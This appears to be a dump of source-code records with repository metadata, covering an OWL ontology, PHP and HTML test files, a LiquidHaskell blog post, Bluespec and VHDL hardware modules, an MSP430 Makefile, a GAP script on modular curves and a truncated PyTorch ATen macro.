<SameIndividual>
<NamedIndividual IRI="Mary"/>
<NamedIndividual abbreviatedIRI="otherOnt:MaryBrown"/>
</SameIndividual>
<ObjectPropertyAssertion>
<ObjectProperty IRI="hasWife"/>
<NamedIndividual IRI="John"/>
<NamedIndividual IRI="Mary"/>
</ObjectPropertyAssertion>
<ObjectPropertyAssertion>
<ObjectProperty IRI="#hasAncestor"/>
<NamedIndividual IRI="Susan"/>
<NamedIndividual IRI="Meg"/>
</ObjectPropertyAssertion>
<DataPropertyAssertion>
<DataProperty IRI="hasAge"/>
<NamedIndividual IRI="John"/>
<Literal datatypeIRI="&xsd;integer">51</Literal>
</DataPropertyAssertion>
<ClassAssertion>
<Class IRI="Person"/>
<NamedIndividual IRI="Mary"/>
</ClassAssertion>
<ClassAssertion>
<Class IRI="Woman"/>
<NamedIndividual IRI="Mary"/>
</ClassAssertion>
<ClassAssertion>
<ObjectIntersectionOf>
<Class IRI="Person"/>
<ObjectComplementOf>
<Class IRI="Parent"/>
</ObjectComplementOf>
</ObjectIntersectionOf>
<NamedIndividual IRI="Jack"/>
</ClassAssertion>
<ClassAssertion>
<ObjectMaxCardinality cardinality="4">
<ObjectProperty IRI="hasChild"/>
<Class IRI="Parent"/>
</ObjectMaxCardinality>
<NamedIndividual IRI="John"/>
</ClassAssertion>
<ClassAssertion>
<ObjectMinCardinality cardinality="2">
<ObjectProperty IRI="hasChild"/>
<Class IRI="Parent"/>
</ObjectMinCardinality>
<NamedIndividual IRI="John"/>
</ClassAssertion>
<ClassAssertion>
<ObjectExactCardinality cardinality="3">
<ObjectProperty IRI="hasChild"/>
<Class IRI="Parent"/>
</ObjectExactCardinality>
<NamedIndividual IRI="John"/>
</ClassAssertion>
<ClassAssertion>
<ObjectExactCardinality cardinality="5">
<ObjectProperty IRI="hasChild"/>
</ObjectExactCardinality>
<NamedIndividual IRI="John"/>
</ClassAssertion>
<ClassAssertion>
<Class IRI="Father"/>
<NamedIndividual IRI="John"/>
</ClassAssertion>
<ClassAssertion>
<Class IRI="SocialRole"/>
<NamedIndividual IRI="Father"/>
</ClassAssertion>
<NegativeObjectPropertyAssertion>
<ObjectProperty IRI="hasWife"/>
<NamedIndividual IRI="Bill"/>
<NamedIndividual IRI="Mary"/>
</NegativeObjectPropertyAssertion>
<NegativeDataPropertyAssertion>
<DataProperty IRI="hasAge"/>
<NamedIndividual IRI="Jack"/>
<Literal datatypeIRI="&xsd;integer">53</Literal>
</NegativeDataPropertyAssertion>
<NegativeObjectPropertyAssertion>
<ObjectProperty IRI="hasDaughter"/>
<NamedIndividual IRI="Bill"/>
<NamedIndividual IRI="Susan"/>
</NegativeObjectPropertyAssertion>
</Ontology>
| Web Ontology Language | 5 | jheinnic/SciGraph | SciGraph-core/src/test/resources/ontologies/family.owl | [
"Apache-2.0"
] |
MODULE SHAPEFILE
DESCRIPTION IDL shapefile format support DLM
VERSION shapelib 1.2.10
SOURCE Harris Geospatial Solutions, Inc.
BUILD_DATE JUN 29 2020
CHECKSUM AN86EBFY
FUNCTION IDLFFSHAPE::GETATTRIBUTES 1 2 KEYWORDS
FUNCTION IDLFFSHAPE::GETENTITY 1 2 KEYWORDS
FUNCTION IDLFFSHAPE::INIT 1 2 KEYWORDS
FUNCTION IDLFFSHAPE::OPEN 1 2 KEYWORDS
PROCEDURE IDLFFSHAPE::ADDATTRIBUTE 4 4 KEYWORDS
PROCEDURE IDLFFSHAPE::CLEANUP 1 1
PROCEDURE IDLFFSHAPE::CLOSE 1 1
PROCEDURE IDLFFSHAPE::DESTROYENTITY 2 2
PROCEDURE IDLFFSHAPE::GETPROPERTY 1 1 KEYWORDS
PROCEDURE IDLFFSHAPE::PUTENTITY 2 2
PROCEDURE IDLFFSHAPE::SETATTRIBUTES 3 4
STRUCTURE IDLFFSHAPE
STRUCTURE IDL_SHAPE_ATTRIBUTE
STRUCTURE IDL_SHAPE_ENTITY
| IDL | 2 | rogerionegri/MICE | MICE/idl88/bin/bin.linux.x86_64/idl_shape.dlm | [
"MIT"
] |
"""The SolarEdge Local Integration."""
| Python | 0 | domwillcode/home-assistant | homeassistant/components/solaredge_local/__init__.py | [
"Apache-2.0"
] |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title>XHTML markup</title>
</head>
<body style="background-color:#ffffcc; color:#008800">
<br />
<h2 align="center">Sample XHTML page</h2>
<br />
<div align="center">
<img src="../images/bee3.jpg" width="400" height="250" alt="Beep" vspace="20" />
</div>
<p align="center" style="font-size:17px">Bar Foo,<br />
Foo,<br />
Bar<br />
Foo</p>
<p align="center"><em>String</em></p>
<br />
<hr />
</body>
</html>
| HTML | 3 | fuelingtheweb/prettier | tests/html_doctype_declarations/xhtml1.1.html | [
"MIT"
] |
--TEST--
hex2bin(); function test
--CREDITS--
edgarsandi - <edgar.r.sandi@gmail.com>
--FILE--
<?php
var_dump(hex2bin('AH'));
var_dump(hex2bin('HA'));
?>
--EXPECTF--
Warning: hex2bin(): Input string must be hexadecimal string in %s on line %d
bool(false)
Warning: hex2bin(): Input string must be hexadecimal string in %s on line %d
bool(false)
| PHP | 3 | thiagooak/php-src | ext/standard/tests/strings/hex2bin_error.phpt | [
"PHP-3.01"
] |
---
layout: post
title: "Lexicographic Termination"
date: 2013-12-15 16:12
comments: true
external-url:
categories: termination, lexicographic ordering
author: Niki Vazou
published: true
demo: LexicographicTermination.hs
---
[Previously][ref-termination] we saw how refinements can be used to prove termination
and we promised to extend our termination checker to handle "real-word" programs.
Keeping our promise, today we shall see a trick that allows liquidHaskell to prove termination on
more recursive functions, namely *lexicographic termination*.
<!-- more -->
<div class="hidden">
\begin{code}
module LexicographicTermination where
import Language.Haskell.Liquid.Prelude (liquidError)
\end{code}
</div>
Does Ackermann Function Terminate?
----------------------------------
Consider the famous [Ackermann
function](http://en.wikipedia.org/wiki/Ackermann_function)
\begin{code}
{-@ ack :: m:Nat -> n:Nat -> Nat @-}
ack :: Int -> Int -> Int
ack m n
| m == 0 = n + 1
| m > 0 && n == 0 = ack (m-1) 1
| m > 0 && n > 0 = ack (m-1) (ack m (n-1))
| otherwise = liquidError "Bad arguments!!!"
\end{code}
Does `ack` terminate?
At each iteration
1. Either `m` decreases,
2. or `m` remains the same and `n` decreases.
Each time that `n` reaches `0`, `m` decreases, so `m` will
eventaully reach `0` and `ack` will terminate.
Expressed more technically the pair `(m, n)`
decreases in the [lexicographic order](htpp://en.wikipedia/wiki/Lexicographic_order)
on pairs, which is a well-ordering, ie.,
we cannot go down infinitely many times.
Express Termination Metric
--------------------------
Great! The pair `(m, n)` is a *well-founded metric* on the Ackermann function that decreases.
From the [previous post][ref-termination] a well-founded metric is all
liquidHaskell needs to prove termination.
So, we should feed the tool with this information.
Remember the `Decrease` token?
We used it [previously][ref-termination]
to specify which is the decreasing argument.
Now, we will use it with more arguments to specify
our decreasing pair. So,
\begin{code}
{-@ Decrease ack 1 2 @-}
\end{code}
says that the decreasing metric is the pair of the first
and the second arguments,
ie., the pair `(m, n)`.
Finally, we will see how liquidHaskell uses this annotation to prove
termination.
Proving Termination By Types
----------------------------
Following once more our [previous post][ref-termination],
liquidHaskell typechecks the *body* of `ack` under an environment that
restricts `ack` to only be called on inputs *less than* `(m,n)`.
This time "less than" referes not to ordering on natural numbers, but to lexicographic
ordering
, i.e., using
an environment:
- `m :: Nat`
- `n :: Nat`
- `ack :: m':Nat -> n':{v:Nat | m' < m || (m' = m && v < n)} -> Nat`
This ensures that any (recursive) call in the body only calls `ack`
with inputs smaller than the current parameter `(m, n)`. Since its body
typechecks in this environment, i.e. `ack` is called with smaller parameters, LiquidHaskell proves
that `ack` terminates.
Someone may find the `Decrease` token annoying:
if we insert another argument we should also update the decrease information.
LiquidHaskell supports an alternative notation,
which lets you annotate the type signature
with a list of *decreasing expressions*.
\begin{code} So, `ack` will also typecheck against the signature:
{-@ ack :: m:Nat -> n:Nat -> Nat / [m, n] @-}
\end{code}
But what is the syntax of the decreasing expressions?
Are they restricted to function parameters?
No, but that is the subject of a next post!
[ref-lies]: /blog/2013/11/23/telling-lies.lhs/
[ref-bottom]: /blog/2013/12/01/getting-to-the-bottom.lhs/
[ref-termination]: /blog/2013/12/08/termination-checking.lhs/
| Literate Haskell | 5 | curiousleo/liquidhaskell | docs/blog/2013-12-24-lexicographic-termination.lhs | [
"MIT",
"BSD-3-Clause"
] |
// Copyright (c) 2017 Massachusetts Institute of Technology
//
// Permission is hereby granted, free of charge, to any person
// obtaining a copy of this software and associated documentation
// files (the "Software"), to deal in the Software without
// restriction, including without limitation the rights to use, copy,
// modify, merge, publish, distribute, sublicense, and/or sell copies
// of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be
// included in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
// BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
// ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
// CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
import Ehr::*;
import CCTypes::*;
import Vector::*;
import ProcTypes::*;
interface MshrDeadlockChecker#(numeric type num);
method ActionValue#(Maybe#(Bit#(TLog#(num)))) getStuckIdx; // get deadlock MSHR idx
method Action initEntry(Bit#(TLog#(num)) n); // new MSHR entry allocated
method Action releaseEntry(Bit#(TLog#(num)) n); // existing MSHR entry released
endinterface
module mkMshrDeadlockChecker(MshrDeadlockChecker#(num)) provisos(
Alias#(idxT, Bit#(TLog#(num)))
);
Integer check_port = 0;
Integer incr_port = 1;
// timer for each entry to detect deadlock: being processed for 64M cycles
Vector#(num, Ehr#(2, Maybe#(DeadlockTimer))) timer <- replicateM(mkEhr(Invalid));
// when new entry is allocated, init timer
Vector#(num, PulseWire) init <- replicateM(mkPulseWire);
// when existing entry is released, end the timer
Vector#(num, PulseWire) done <- replicateM(mkPulseWire);
(* fire_when_enabled, no_implicit_conditions *)
rule incrTimer;
for(Integer i = 0; i < valueof(num); i = i+1) begin
if(init[i]) begin
timer[i][incr_port] <= Valid (0);
end
else if(done[i]) begin
timer[i][incr_port] <= Invalid;
end
else if(timer[i][incr_port] matches tagged Valid .t &&& t != maxBound) begin
timer[i][incr_port] <= Valid (t + 1);
end
end
endrule
method ActionValue#(Maybe#(idxT)) getStuckIdx;
function Bool isDeadlock(Integer i);
return timer[i][check_port] == Valid (maxBound);
endfunction
Vector#(num, Integer) idxVec = genVector;
if(searchIndex(isDeadlock, idxVec) matches tagged Valid .n) begin
timer[n][check_port] <= Valid (0);
return Valid (n);
end
else begin
return Invalid;
end
endmethod
method Action initEntry(idxT n);
init[n].send;
endmethod
method Action releaseEntry(idxT n);
done[n].send;
endmethod
endmodule
| Bluespec | 4 | faddat/Flute | src_Core/Near_Mem_VM_WB_L1_L2/src_LLCache/coherence/src/MshrDeadlockChecker.bsv | [
"Apache-2.0"
] |
----------------------------------------------------------------------------------
-- Engineer: Mike Field <hamster@snap.net.nz>
--
-- Module Name: icmp_extract_icmp_header - Behavioral
--
-- Description: Remove the ICMP header details off of the data packet
-- and pass the data on if valid.
--
------------------------------------------------------------------------------------
-- FPGA_Webserver from https://github.com/hamsternz/FPGA_Webserver
------------------------------------------------------------------------------------
-- The MIT License (MIT)
--
-- Copyright (c) 2015 Michael Alan Field <hamster@snap.net.nz>
--
-- Permission is hereby granted, free of charge, to any person obtaining a copy
-- of this software and associated documentation files (the "Software"), to deal
-- in the Software without restriction, including without limitation the rights
-- to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-- copies of the Software, and to permit persons to whom the Software is
-- furnished to do so, subject to the following conditions:
--
-- The above copyright notice and this permission notice shall be included in
-- all copies or substantial portions of the Software.
--
-- THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-- IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-- FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-- AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-- LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-- OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-- THE SOFTWARE.
--
----------------------------------------------------------------------------------
library IEEE;
use IEEE.STD_LOGIC_1164.ALL;
use IEEE.NUMERIC_STD.ALL;
entity icmp_extract_icmp_header is
Port ( clk : in STD_LOGIC;
data_valid_in : in STD_LOGIC;
data_in : in STD_LOGIC_VECTOR (7 downto 0);
data_valid_out : out STD_LOGIC := '0';
data_out : out STD_LOGIC_VECTOR (7 downto 0) := (others => '0');
icmp_type : out STD_LOGIC_VECTOR (7 downto 0) := (others => '0');
icmp_code : out STD_LOGIC_VECTOR (7 downto 0) := (others => '0');
icmp_checksum : out STD_LOGIC_VECTOR (15 downto 0) := (others => '0');
icmp_identifier : out STD_LOGIC_VECTOR (15 downto 0) := (others => '0');
icmp_sequence : out STD_LOGIC_VECTOR (15 downto 0) := (others => '0'));
end icmp_extract_icmp_header;
architecture Behavioral of icmp_extract_icmp_header is
signal count : unsigned(3 downto 0) := (others => '0');
signal i_icmp_type : STD_LOGIC_VECTOR (7 downto 0) := (others => '0');
signal i_icmp_code : STD_LOGIC_VECTOR (7 downto 0) := (others => '0');
signal i_icmp_checksum : STD_LOGIC_VECTOR (15 downto 0) := (others => '0');
signal i_icmp_identifier : STD_LOGIC_VECTOR (15 downto 0) := (others => '0');
signal i_icmp_sequence : STD_LOGIC_VECTOR (15 downto 0) := (others => '0');
begin
icmp_type <= i_icmp_type;
icmp_code <= i_icmp_code;
icmp_checksum <= i_icmp_checksum;
icmp_identifier <= i_icmp_identifier;
icmp_sequence <= i_icmp_sequence;
process(clk)
begin
if rising_edge(clk) then
data_out <= data_in;
if data_valid_in = '1' then
-- Note, at count of zero,
case count is
when "0000" => i_icmp_type <= data_in;
when "0001" => i_icmp_code <= data_in;
when "0010" => i_icmp_checksum(7 downto 0) <= data_in;
when "0011" => i_icmp_checksum(15 downto 8) <= data_in;
when "0100" => i_icmp_identifier(7 downto 0) <= data_in;
when "0101" => i_icmp_identifier(15 downto 8) <= data_in;
when "0110" => i_icmp_sequence(7 downto 0) <= data_in;
when "0111" => i_icmp_sequence(15 downto 8) <= data_in;
when others => if i_icmp_type = x"08" and i_icmp_code = x"00" then
data_valid_out <= data_valid_in;
data_out <= data_in;
else
data_valid_out <= '0';
data_out <= (others => '0');
end if;
end case;
if count /= "1111" then
count <= count+1;
end if;
else
data_valid_out <= '0';
data_out <= data_in;
count <= (others => '0');
end if;
end if;
end process;
end Behavioral;
| VHDL | 5 | hamsternz/FPGA_Webserver | hdl/icmp/icmp_extract_icmp_header.vhd | [
"MIT"
] |
|v|
"creates an vector that holds up to 20 elements"
v: vector copySize: 20.
"access the first element"
v first printLine.
"access the 10th element"
(v at: 9) printLine.
"put 100 as second value"
vat: 1 Put: 100.
| Self | 4 | LaudateCorpus1/RosettaCodeData | Task/Arrays/Self/arrays-4.self | [
"Info-ZIP"
] |
build: components slick.js slick.css
@component build --dev
components: component.json
@component install --dev
.PHONY: clean
| Makefile | 3 | wiratmoko11/adibuana-web | assets/vendors/slick-carousel/Makefile | [
"MIT"
] |
#
# Generic and Simple Atmel AVR GNU Makefile
#
# Desinged for the gnu-avr tool chain
#
# Universal 8bit Graphics Library
#
# Copyright (c) 2012, olikraus@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this list
# of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Features
# - upload
# - create exe from library
# - create assembler listing (.dis)
#
# Limitations
# - only C-files supported
# - no automatic dependency checking (call 'make clean' if any .h files are changed)
#
# Targets:
# make
# create hex file, no upload
# make upload
# create and upload hex file
# make clean
# delete all generated files
#
# Note:
# Display list make database: make -p -f/dev/null | less
#================================================
# Project Information
TARGETNAME = u8g_main
MCU:=msp430f5529
DMCU:=__MSP430F5529__
F_CPU:=16000000
MSRC = main.c
U8GDIR = ../../../csrc/
FONTDIR = ../../../sfntsrc/
#================================================
# System/Environment Information
TIPATH:=/usr/local/ti/ccsv6
MSP430GCC:=gcc_msp430_4.9.14r1_10
TOOLSPATH:=$(TIPATH)/tools/compiler/$(MSP430GCC)/bin/
# Add proper arguments for tiflahser
MSP430HEX:=
#================================================
# Main part of the Makefile starts here. Usually no changes are needed.
# Append U(G Library
SRC = system_pre_init.c
SRC += $(shell ls $(U8GDIR)*.c)
SRC += $(shell ls $(FONTDIR)*.c)
# Internal Variable Names
LIBNAME:=$(TARGETNAME).a
ELFNAME:=$(TARGETNAME).elf
HEXNAME:=$(TARGETNAME).hex
DISNAME:=$(TARGETNAME).dis
OBJ := $(SRC:.c=.o)
MOBJ := $(MSRC:.c=.o)
# GNU compiler
CC = $(TOOLSPATH)msp430-elf-gcc
CXX = $(TOOLSPATH)msp430-elf-g++
AR = $(TOOLSPATH)msp430-elf-ar
# GNU Tools
OBJCOPY:=$(TOOLSPATH)msp430-elf-objcopy
OBJDUMP:=$(TOOLSPATH)msp430-elf-objdump
SIZE:=$(TOOLSPATH)msp430-elf-size
# C flags
COMMON_FLAGS = -DF_CPU=$(F_CPU) -D$(DMCU) -mmcu=$(MCU)
COMMON_FLAGS += -g -Os -Wall -funsigned-char -funsigned-bitfields -fpack-struct -fshort-enums
COMMON_FLAGS += -I. -I$(U8GDIR) -I$(TIPATH)/ccs_base/msp430/include_gcc
COMMON_FLAGS += -ffunction-sections -fdata-sections -Wl,--gc-sections
COMMON_FLAGS += -Wl,--relax
COMMON_FLAGS +=
CFLAGS = $(COMMON_FLAGS) -std=gnu99 -Wstrict-prototypes
# Linker script
LDLIBS = -T $(TIPATH)/ccs_base/msp430/include_gcc/$(MCU).ld
# Additional Suffixes
.SUFFIXES: .elf .hex .dis
# Targets
.PHONY: all
all: $(DISNAME) $(HEXNAME)
$(SIZE) $(ELFNAME)
.PHONY: upload
upload: $(DISNAME) $(HEXNAME)
$(SIZE) $(ELFNAME)
.PHONY: clean
clean:
$(RM) $(HEXNAME) $(ELFNAME) $(LIBNAME) $(DISNAME) $(OBJ) $(MOBJ)
# implicit rules
.elf.hex:
$(OBJCOPY) -O ihex -R .eeprom $< $@
# explicit rules
$(ELFNAME): $(LIBNAME)($(OBJ)) $(MOBJ)
$(LINK.o) $(COMMON_FLAGS) $(MOBJ) $(LIBNAME) $(LOADLIBES) $(LDLIBS) -o $@
$(DISNAME): $(ELFNAME)
$(OBJDUMP) -S $< > $@
| Gnuplot | 4 | JJPowelly/u8glib | sys/msp430/chess/Makefile.gnu | [
"BSD-2-Clause"
] |
##############################################################
##
## Helps compute the decomposition of
## the ramification module and the equivariant
## degree of a multiple of a simple orbit for
## the modular curves X(p) with automorphism group
## G = PSL(2,p), p a prime.
##
## Using these computations and Borne's formula, the
## G-module structure of the RR spaces of equivariant
## divisors can be determined explicitly.
##
## Reference: D. Joyner and A. Ksir, "Modular representations
## on some Riemann-Roch spaces of modular curves
## $X(N)$, Computational Aspects of Algebraic Curves,
## (Editor: T. Shaska) Lecture Notes in Computing,
## WorldScientific, 2005.)
##
##
## 12-30-2004, wdj
###########################################################
## To read this in, use for example:
### Read("/home/wdj/gapfiles/curves/mod_crv_aut_gp3.gap");
## To log your results, use for example:
### LogTo("/home/wdj/gapfiles/mod_crv_aut_gp1.log");
ram_module_X:=function(p)
## p is a prime
## output is [m1,...,mn]
## where n = # conj classes of G=PSL(2,p)
## and mi = mult of pi_i in ram mod of modular curve
## X with AutGp(X) = G.
## Here Irr(G) = [pi_1,...,pi_n] (in that order).
##
local G,i,j,n,n0,H,G1,H_chars,CG,G_chars,w,m,theta,pi_theta_to_the;
G:=PSL(2,p);
H:=[];
H_chars:=[];
n0:=[ [ Z(p)^0, Z(p) ], [ Z(p)*0, Z(p)^0 ] ];
CG:=ConjugacyClassesSubgroups(G);
H[1]:=Representative(CG[2]); # size 2
H[2]:=Representative(CG[3]); # size 3
n :=Size(CG);
for i in [1..n] do
if Size(Representative(CG[i]))=p then
H[3]:=Representative(CG[i]);
fi;
od;
## H[3]:=Group(n0); # size p
for i in [1..Size(H)] do
H_chars[i]:=Irr(H[i]);
od;
G_chars:=Irr(G);
m:=[];
m[1]:=[];m[2]:=[];m[3]:=[];
theta:=List([1..3],i->H_chars[i][2]);
pi_theta_to_the:=List([1..3],i->Sum([1..(Size(H[i])-1)],
j->j*InducedClassFunction(theta[i]^(j),G)));
#Print("\n\n pi_theta_to_the = ",Sum(pi_theta_to_the),"\n\n");
for i in [1..3] do
m[i]:=List(G_chars, pi->ScalarProduct(pi_theta_to_the[i],pi))/Size(H[i]);
od;
#Print("\n\n m = ",m,"\n\n");
return Sum(m);
end;
#ram_module_X(5);
#[ 0, 3, 3, 4, 5 ]
#ram_module_X(7);
#[ 0, 4, 3, 6, 7, 8 ]
#ram_module_X(11);
#[ 0, 5, 6, 11, 10, 12, 12, 12 ]
#ram_module_X(13);
#[ 0, 7, 7, 13, 13, 13, 13, 14, 15 ]
#ram_module_X(17);
#[ 0, 9, 9, 18, 17, 17, 17, 18, 18, 19, 19 ]
#ram_module_X(19);
#[ 0, 9, 10, 20, 20, 19, 19, 20, 20, 21, 21, 21 ]
#ram_module_X(23);
#[ 0, 14, 11, 24, 24, 24, 23, 23, 25, 25, 25, 25, 25, 25 ]
#ram_module_X(29);
#[ 0, 16, 16, 30, 31, 31, 30, 30, 30, 30, 31, 32, 32, 32, 31, 31, 31 ]
#ram_module_X(31);
#[ 0, 18, 15, 33, 33, 33, 32, 32, 32, 32, 33, 34, 33, 33, 34, 34, 34, 34 ]
#ram_module_X(37);
#[ 0, 20, 20, 39, 39, 39, 39, 39, 39, 39, 39, 39, 39, 40, 39, 41, 41, 41, 40, 40, 40 ]
ram_module_X_JK:=function(p)
## p is a prime
## output is (m1,...,mn)
## where n = # conj classes of G=PSL(2,p)
## and mi = "mult of pi_i in ram mod of G" using JK formula
##
local G,i,j,n,n0,H,G1,H_chars,CG,G_chars,A,B,C,D,pi;
G:=PSL(2,p);
H:=[];
H_chars:=[];
n0:=[ [ Z(p)^0, Z(p) ], [ Z(p)*0, Z(p)^0 ] ];
CG:=ConjugacyClassesSubgroups(G);
H[1]:=Representative(CG[2]); # size 2
H[2]:=Representative(CG[3]); # size 3
n:=Size(CG);
for i in [1..n] do
if Size(Representative(CG[i]))=p then
H[3]:=Representative(CG[i]);
fi;
od;
## H[3]:=Group(n0); # size p
for i in [1..Size(H)] do
H_chars[i]:=Irr(H[i]);
od;
G_chars:=Irr(G);
n:=Length(G_chars);
A:=[];
for i in [1..n] do
pi:=G_chars[i];
A[i]:=ScalarProduct(H_chars[1][1],RestrictedClassFunction(pi,H[1]));
od;
B:=[];
for i in [1..n] do
pi:=G_chars[i];
B[i]:=ScalarProduct(H_chars[2][1],RestrictedClassFunction(pi,H[2]));
od;
C:=[];
for i in [1..n] do
pi:=G_chars[i];
C[i]:=ScalarProduct(H_chars[3][1],RestrictedClassFunction(pi,H[3]));
od;
D:=[];
for i in [1..n] do
pi:=G_chars[i];
D[i]:=DegreeOfCharacter(pi);
od;
return (1/2)*(3*D-A-B-C);
end;
#ram_module_X_JK(5);
#[ 0, 3, 3, 4, 5 ]
#ram_module_X_JK(7);
#[ 0, 7/2, 7/2, 6, 7, 8 ]
#ram_module_X_JK(11);
#[ 0, 11/2, 11/2, 11, 10, 12, 12, 12 ]
#ram_module_X_JK(13);
#[ 0, 7, 7, 13, 13, 13, 13, 15, 14 ]
#ram_module_X_JK(17);
#[ 0, 9, 9, 18, 17, 17, 17, 18, 18, 19, 19 ]
#ram_module_X_JK(19);
#[ 0, 19/2, 19/2, 20, 20, 19, 19, 20, 20, 21, 21, 21 ]
#ram_module_X_JK(23);
#[ 0, 25/2, 25/2, 24, 24, 24, 23, 23, 25, 25, 25, 25, 25, 25 ]
#ram_module_X_JK(29);
#[ 0, 16, 16, 30, 31, 31, 30, 30, 30, 30, 31, 32, 32, 32, 31, 31, 31 ]
pieces_ram_module_X:=function(p)
## p is a prime
## output is (m1,...,mn)
## where n = # conj classes of G=PSL(2,p)
## and mi = mult of pi_i in ram mod of G
##
local G,i,j,n,n0,H,G1,H_chars,CG,G_chars,w,m,theta,pi_theta_to_the;
G:=PSL(2,p);
H:=[];
H_chars:=[];
n0:=[ [ Z(p)^0, Z(p) ], [ Z(p)*0, Z(p)^0 ] ];
CG:=ConjugacyClassesSubgroups(G);
H[1]:=Representative(CG[2]); # size 2
H[2]:=Representative(CG[3]); # size 3
n :=Size(CG);
for i in [1..n] do
if Size(Representative(CG[i]))=p then
H[3]:=Representative(CG[i]);
fi;
od;
## H[3]:=Group(n0); # size p
for i in [1..Size(H)] do
H_chars[i]:=Irr(H[i]);
od;
G_chars:=Irr(G);
m:=[];
m[1]:=[];m[2]:=[];m[3]:=[];
theta:=List([1..3],i->H_chars[i][2]);
pi_theta_to_the:=List([1..3],i->Sum([1..(Size(H[i])-1)],
j->j*InducedClassFunction(theta[i]^(j),G)));
#Print("\n\n pi_theta_to_the = ",Sum(pi_theta_to_the),"\n\n");
for i in [1..3] do
m[i]:=List(G_chars, pi->ScalarProduct(pi_theta_to_the[i],pi));
od;
#Print("\n\n m = ",m,"\n\n");
return m;
end;
equiv_deg_module_X:=function(p,ii,r)
## p is a prime
## ii = 1 for H[1], size 2
## ii = 2 for H[2], size 3
## ii = 3 for H[3], size p
## output is (m1,...,mn)
## where n = # conj classes of G=PSL(2,p)
## and mi = mult of pi_i in deg_equiv module of G
##
local G,i,j,n,n0,H,G1,H_chars,CG,G_chars,w,m,theta,pi_theta,pi_theta_to_the;
G:=PSL(2,p);
H:=[]; # 3 decomp gps
H_chars:=[];
n0:=[ [ Z(p)^0, Z(p) ], [ Z(p)*0, Z(p)^0 ] ];
CG:=ConjugacyClassesSubgroups(G);
H[1]:=Representative(CG[2]); # size 2
H[2]:=Representative(CG[3]); # size 3
n:=Size(CG);
for i in [1..n] do
if Size(Representative(CG[i]))=p then
H[3]:=Representative(CG[i]);
fi;
od;
## H[3]:=Group(n0); # size p
for i in [1..3] do
H_chars[i]:=Irr(H[i]);
od;
G_chars:=Irr(G);
m:=[];
m[1]:=[];m[2]:=[];m[3]:=[];
theta:=List([1..3],i->H_chars[i][2]);
pi_theta_to_the:=List([1..3],i->List([1..r],j->InducedClassFunction(theta[i]^(-j),G)));
for i in [1..3] do
for j in [1..r] do
m[i][j]:=List(G_chars, pi->ScalarProduct(pi_theta_to_the[i][j],pi));
od;
od;
return Sum(m[ii]);
end;
# equiv_deg_module_X(7,2,1);
#[ 0, 1, 1, 2, 2, 3 ]
# equiv_deg_module_X(7,1,1);
#[ 0, 2, 2, 2, 4, 4 ]
# equiv_deg_module_X(7,3,1);
#[ 0, 1, 0, 1, 1, 1 ]
# equiv_deg_module_X(7,3,7);
#[ 1, 3, 3, 6, 7, 8 ]
# equiv_deg_module_X(7,1,2);
#[ 1, 3, 3, 6, 7, 8 ]
| GAP | 5 | bopopescu/sage | src/ext/gap/joyner/modular_crv_rr_sp.gap | [
"BSL-1.0"
] |
#include <ATen/ATen.h>
#include <ATen/native/ForeachUtils.h>
#include <c10/util/irange.h>
namespace at { namespace native {
#define FOREACH_BINARY_OP_SCALAR(OP) \
void foreach_tensor_##OP##_scalar_kernel_slow_(TensorList tensors, const Scalar& scalar) { \
check_foreach_api_restrictions(tensors); \
\
for (auto& t: tensors) { \
t.OP##_(scalar); \
} \
} \
\
std::vector<Tensor> foreach_tensor_##OP##_scalar_kernel_slow(TensorList tensors, const Scalar& scalar) { \
check_foreach_api_restrictions(tensors); \
\
std::vector<Tensor> result; \
result.reserve(tensors.size()); \
for (const auto& t: tensors) { \
